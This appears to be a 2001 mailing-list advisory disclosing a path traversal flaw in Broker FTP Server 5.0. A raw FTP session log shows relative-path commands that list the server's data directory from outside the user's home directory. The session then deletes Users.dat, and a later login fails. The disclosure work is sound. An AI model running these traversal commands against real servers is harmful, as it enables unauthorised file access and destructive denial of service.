Date: Sat, 3 Mar 2001 18:56:23 -0000
From: [email protected]
To: [email protected]Subject: Broker Ftp Server 5.0 Vulnerability
Vulnerability:
users can break out of their root directory and list
directories.
Depending on the priv. you have other commands
like delete maybe
executed outside of the home. directory.
e:\crap\ was used as homedir.
deleting files in e:\crap is enabled
Detail:
Problem: Again relative paths.
dir:
listings directories outside of root dir.
Risc: medium-high
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29
bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden
323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission
ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000
UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54
Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33
Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34
Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59
BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08
KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37
Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53
Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie
von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden
629000,00KB/s
delete:
deleting files outside of root dir.
ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat'
deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.
C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(
by deleting users.dat, noone will be able to logon ...
put/get commands seem to be secure...
This was tested with win2k and trail version of broker
ver. 5.0
[email protected] or
[email protected]
